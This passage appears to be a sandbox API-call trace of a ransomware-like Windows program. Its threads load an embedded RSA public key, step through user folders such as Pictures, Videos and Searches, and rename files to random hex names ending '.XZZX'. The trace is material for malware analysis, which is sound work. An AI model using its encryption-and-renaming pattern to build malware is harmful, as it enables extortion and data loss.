LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.350] lstrcpyW (in: lpString1=0x2caf460, lpString2="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" | out: lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" [0195.350] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.350] SetErrorMode (uMode=0x1) returned 0x1 [0195.350] lstrcpyW (in: lpString1=0x2caf860, lpString2="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" | out: lpString1="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" [0195.351] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x40c99ff1, Data2=0xa23a, Data3=0x4fb3, Data4=([0]=0x88, [1]=0x92, [2]=0xd4, [3]=0x18, [4]=0xd9, [5]=0x9b, [6]=0xdc, [7]=0xa))) returned 0x0 [0195.351] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned 80 [0195.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0195.351] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\44E4BE9A3281548E40C99FF1354C38D6.XZZX") returned 80 [0195.351] StrStrW (lpFirst="F28BD0F0084D975830F3B58E0C6E7BA0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 744 os_tid = 0xe38 [0195.508] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.508] lstrcpyW (in: lpString1=0x2caf460, lpString2="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" | out: lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" [0195.508] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.509] SetErrorMode (uMode=0x1) returned 0x1 [0195.509] lstrcpyW (in: lpString1=0x2caf860, lpString2="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" | out: lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" [0195.509] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xea746502, Data2=0xe5b8, Data3=0x45ad, Data4=([0]=0xac, [1]=0x62, [2]=0x12, [3]=0xcc, [4]=0xac, [5]=0xca, [6]=0x7d, [7]=0xa))) returned 0x0 [0195.509] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned 80 [0195.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0195.509] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A20363703E85D558EA7465024150B9A0.XZZX") returned 80 [0195.509] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 745 os_tid = 0xe3c [0195.662] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.662] lstrcpyW (in: lpString1=0x2caf460, lpString2="FBB049370C08D85D799956BD1029BCA5.XZZX" | out: lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX") returned="FBB049370C08D85D799956BD1029BCA5.XZZX" [0195.662] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.662] SetErrorMode (uMode=0x1) returned 0x1 [0195.662] lstrcpyW (in: lpString1=0x2caf860, lpString2="FBB049370C08D85D799956BD1029BCA5.XZZX" | out: lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX") returned="FBB049370C08D85D799956BD1029BCA5.XZZX" [0195.662] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xccb82a02, Data2=0xea9, Data3=0x4f4b, Data4=([0]=0x8f, [1]=0x88, [2]=0x32, [3]=0x38, [4]=0x49, [5]=0xb5, [6]=0xf2, [7]=0xf5))) returned 0x0 [0195.662] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FBB049370C08D85D799956BD1029BCA5.XZZX") returned 80 [0195.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0195.662] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\37DFD752048A7283CCB82A02075556CB.XZZX") returned 80 [0195.662] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 746 os_tid = 0xe40 [0195.826] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.826] lstrcpyW (in: lpString1=0x2caf460, lpString2="C8D828EF44C6B909469A8E7948E79D51.XZZX" | out: lpString1="C8D828EF44C6B909469A8E7948E79D51.XZZX") returned="C8D828EF44C6B909469A8E7948E79D51.XZZX" [0195.826] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0195.826] SetErrorMode (uMode=0x1) returned 0x1 [0195.826] lstrcpyW (in: lpString1=0x2caf860, lpString2="C8D828EF44C6B909469A8E7948E79D51.XZZX" | out: lpString1="C8D828EF44C6B909469A8E7948E79D51.XZZX") returned="C8D828EF44C6B909469A8E7948E79D51.XZZX" [0195.826] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xec80d3aa, Data2=0xe90e, Data3=0x43c4, Data4=([0]=0x8d, [1]=0x57, [2]=0x54, [3]=0x29, [4]=0x36, [5]=0xb4, [6]=0x3c, [7]=0x73))) returned 0x0 [0195.826] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\C8D828EF44C6B909469A8E7948E79D51.XZZX") returned 83 [0195.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0195.826] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\2FB14D4C3DB118B8EC80D3AA407BFD00.XZZX") returned 83 [0195.827] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 747 os_tid = 0xe44 [0195.976] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.976] lstrcpyW (in: lpString1=0x2caf460, lpString2="07542892440C59CA51177AF248413E12.XZZX" | out: lpString1="07542892440C59CA51177AF248413E12.XZZX") returned="07542892440C59CA51177AF248413E12.XZZX" [0195.976] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0195.976] SetErrorMode (uMode=0x1) returned 0x1 [0195.976] lstrcpyW (in: lpString1=0x2caf860, lpString2="07542892440C59CA51177AF248413E12.XZZX" | out: lpString1="07542892440C59CA51177AF248413E12.XZZX") returned="07542892440C59CA51177AF248413E12.XZZX" [0195.976] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xd4f8699c, Data2=0xfe9c, Data3=0x4f2b, Data4=([0]=0xad, [1]=0x79, [2]=0x44, [3]=0x2e, [4]=0x8e, [5]=0x5e, [6]=0xed, [7]=0x16))) returned 0x0 [0195.976] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\07542892440C59CA51177AF248413E12.XZZX") returned 80 [0195.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0195.976] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\402923104EBCE834D4F8699C5187CC7C.XZZX") returned 80 [0195.976] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 748 os_tid = 0xe48 [0196.130] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.130] lstrcpyW (in: lpString1=0x2caf460, lpString2="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" | out: lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX") returned="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" [0196.130] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0196.130] SetErrorMode (uMode=0x1) returned 0x1 [0196.130] lstrcpyW (in: lpString1=0x2caf860, lpString2="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" | out: lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX") returned="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" [0196.130] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x5d8e77d3, Data2=0xfb21, Data3=0x4fa9, Data4=([0]=0x90, [1]=0xd8, [2]=0xc2, [3]=0x5, [4]=0x1e, [5]=0x35, [6]=0xbc, [7]=0x4f))) returned 0x0 [0196.130] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\22BE9D582E5129D8AA7CE5BC32720E20.XZZX") returned 80 [0196.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0196.130] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\BED953334E24F7C95D8E77D350EFDC11.XZZX") returned 80 [0196.130] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 749 os_tid = 0xe4c [0196.286] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.286] lstrcpyW (in: lpString1=0x2caf460, lpString2="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" | out: lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" [0196.286] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0196.286] SetErrorMode (uMode=0x1) returned 0x1 [0196.286] lstrcpyW (in: lpString1=0x2caf860, lpString2="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" | out: lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" [0196.286] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x99bf52b, Data2=0xed52, Data3=0x4d45, Data4=([0]=0x9d, [1]=0x6, [2]=0xa1, [3]=0x63, [4]=0xa1, [5]=0x66, [6]=0x8b, [7]=0x35))) returned 0x0 [0196.286] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned 80 [0196.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0196.286] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\75ED56C647A1A11A099BF52B4A6C8562.XZZX") returned 80 [0196.286] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 750 os_tid = 0xe50 [0196.450] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.450] lstrcpyW (in: lpString1=0x2caf460, lpString2="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" | out: lpString1="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" [0196.450] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.450] SetErrorMode (uMode=0x1) returned 0x1 [0196.450] lstrcpyW (in: lpString1=0x2caf860, lpString2="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" | out: lpString1="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" [0196.450] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xae1b1a6f, Data2=0x8489, Data3=0x4045, Data4=([0]=0xa6, [1]=0xe1, [2]=0x91, [3]=0x9a, [4]=0xbe, [5]=0xa9, [6]=0x46, [7]=0x0))) returned 0x0 [0196.450] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned 78 [0196.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0196.450] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\262261672145F8EDAE1B1A6F2410DD35.XZZX") returned 78 [0196.451] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 751 os_tid = 0xe54 [0196.598] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.598] lstrcpyW (in: lpString1=0x2caf460, lpString2="23B23FF43A95B5A94696D7543EB699F1.XZZX" | out: lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX") 